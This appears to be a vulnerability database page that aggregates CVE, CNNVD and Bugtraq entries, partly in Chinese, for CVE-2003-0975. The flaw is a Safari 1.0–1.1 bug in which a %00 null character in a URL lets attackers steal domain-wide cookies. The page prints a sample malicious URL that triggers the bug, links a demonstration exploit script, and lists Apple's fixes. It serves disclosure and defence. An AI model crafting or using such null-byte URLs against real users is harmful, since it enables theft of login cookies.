CVE-2003-0975
CVSS5.0
发布时间 :2003-12-15 00:00:00
修订时间 :2016-10-17 22:38:41
NMCOS    

[原文]Apple Safari 1.0 through 1.1 on Mac OS X 10.3.1 and Mac OS X 10.2.8 allows remote attackers to steal user cookies from another domain via a link with a hex-encoded null character (%00) followed by the target domain.


[CNNVD]Apple Safari Web Browser Null字符Cookie窃取漏洞(CNNVD-200312-021)

        
        Apple Safari是一款基于apple系统的WEB浏览器。
        Apple Safari在处理恶意URL时存在问题,远程攻击者可以利用这个漏洞构建恶意URL,诱使用户访问,窃取敏感COOKIE信息。
        如果Apple Safari浏览器装载如下URL进行解析:
         http://alive.znep.com%00www.passport.com/cgi-bin/cookies
        会导致Apple Safari浏览器连接"%00"之前的主机,但是把COOKIE发送给基于整个主机名的服务器。这个问题可用于窃取特定路径的COOKIE信息,通过在请求URL中的特定路径和SSL,也可以窃取那些使用了secure标记的COOKIE信息。不过对特定主机名的COOKIE设置(如"www.passport.com")不能使用这种方式窃取,只有设置为整个域的COOKIE才存在此问题。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:apple:safari:1.1Apple Safari 1.1
cpe:/o:apple:mac_os_x:10.2.8Apple Mac OS X 10.2.8
cpe:/o:apple:mac_os_x_server:10.2.8Apple Mac OS X Server 10.2.8
cpe:/a:apple:safari:1.0Apple Safari 1.0
cpe:/o:apple:mac_os_x_server:10.3.1Apple Mac OS X Server 10.3.1
cpe:/o:apple:mac_os_x:10.3.1Apple Mac OS X 10.3.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0975
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0975
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-021
(官方数据源) CNNVD

- 其它链接及资源

http://docs.info.apple.com/article.html?artnum=61798
(VENDOR_ADVISORY)  CONFIRM  http://docs.info.apple.com/article.html?artnum=61798
http://lists.apple.com/mhonarc/security-announce/msg00042.html
(UNKNOWN)  CONFIRM  http://lists.apple.com/mhonarc/security-announce/msg00042.html
http://marc.info/?l=bugtraq&m=106917674428552&w=2
(UNKNOWN)  BUGTRAQ  20031118 Apple Safari 1.1 (v100)
http://xforce.iss.net/xforce/xfdb/7973
(UNKNOWN)  XF  mozilla-netscape-steal-cookies(7973)

- 漏洞信息

Apple Safari Web Browser Null字符Cookie窃取漏洞
中危 输入验证
2003-12-15 00:00:00 2006-06-15 00:00:00
远程  
        
        Apple Safari是一款基于apple系统的WEB浏览器。
        Apple Safari在处理恶意URL时存在问题,远程攻击者可以利用这个漏洞构建恶意URL,诱使用户访问,窃取敏感COOKIE信息。
        如果Apple Safari浏览器装载如下URL进行解析:
         http://alive.znep.com%00www.passport.com/cgi-bin/cookies
        会导致Apple Safari浏览器连接"%00"之前的主机,但是把COOKIE发送给基于整个主机名的服务器。这个问题可用于窃取特定路径的COOKIE信息,通过在请求URL中的特定路径和SSL,也可以窃取那些使用了secure标记的COOKIE信息。不过对特定主机名的COOKIE设置(如"www.passport.com")不能使用这种方式窃取,只有设置为整个域的COOKIE才存在此问题。
        

- 公告与补丁

        厂商补丁:
        Apple
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.apple.com

- 漏洞信息

2860
Apple Safari Null Character Cookie Theft

- 漏洞描述

Apple Safari has a flaw which may permit an attacker to steal cookies set for domains (as opposed to hosts), even if set with the 'secure flag' and using SSL. The flaw occurs during the handling of NULL (%00) characters in URLs.

- 时间线

2003-11-25 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Apple has released patches to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Apple Safari Web Browser Null Character Cookie Stealing Vulnerability
Input Validation Error 9065
Yes No
2003-11-18 12:00:00 2009-07-12 12:56:00
This vulnerability was discovered by Austin Gilbert <austin@breakingrobots.net>.

- 受影响的程序版本

Apple Safari 1.1
Apple Safari 1.0
+ Apple Mac OS X 10.2.8
+ Apple Mac OS X 10.2.8
+ Apple Mac OS X 10.2.7
+ Apple Mac OS X 10.2.7
+ Apple Mac OS X 10.2.6
+ Apple Mac OS X 10.2.6
+ Apple Mac OS X 10.2.5
+ Apple Mac OS X 10.2.5
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2
+ Apple Mac OS X 10.2
+ Apple Mac OS X Server 10.2.8
+ Apple Mac OS X Server 10.2.7
+ Apple Mac OS X Server 10.2.7
+ Apple Mac OS X Server 10.2.6
+ Apple Mac OS X Server 10.2.6
+ Apple Mac OS X Server 10.2.5
+ Apple Mac OS X Server 10.2.5
+ Apple Mac OS X Server 10.2.4
+ Apple Mac OS X Server 10.2.4
+ Apple Mac OS X Server 10.2.3
+ Apple Mac OS X Server 10.2.3
+ Apple Mac OS X Server 10.2.2
+ Apple Mac OS X Server 10.2.2
+ Apple Mac OS X Server 10.2.1
+ Apple Mac OS X Server 10.2.1
+ Apple Mac OS X Server 10.2
+ Apple Mac OS X Server 10.2
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.2.8
Apple Mac OS X 10.3.1
Apple Mac OS X 10.2.8

- 漏洞讨论

An issue has been discovered in Apple Safari, which may allow an attacker to steal cookie-based authentication credentials from a user of a vulnerable web browser. The problem is in the handling of NULL (%00) characters in URLs.

This issue may only be exploited to steal cookies set for a domain, as opposed to cookies set for a specific host in that domain. Cookies set with the secure flag can be stolen if the attacker uses SSL.

- 漏洞利用

A demonstration of exploit was made available when the issues described in BID 3925 were initially released. This demo is said to still work on affected Apple Safari releases and can be found by referencing the following link:

http://alive.znep.com/~marcs/security/mozillacookie/cookies-redirect.cgi

- 解决方案

Apple has released an advisory (APPLE-SA-2003-12-05) and fixes to address this issue. Please see referenced advisory for further details. Fixes are linked below.

Apple has released a Security Update to address this vulnerability:


Apple Safari 1.0

Apple Safari 1.1

Apple Mac OS X 10.2.8

Apple Mac OS X Server 10.2.8

Apple Mac OS X 10.3.1

Apple Mac OS X Server 10.3.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站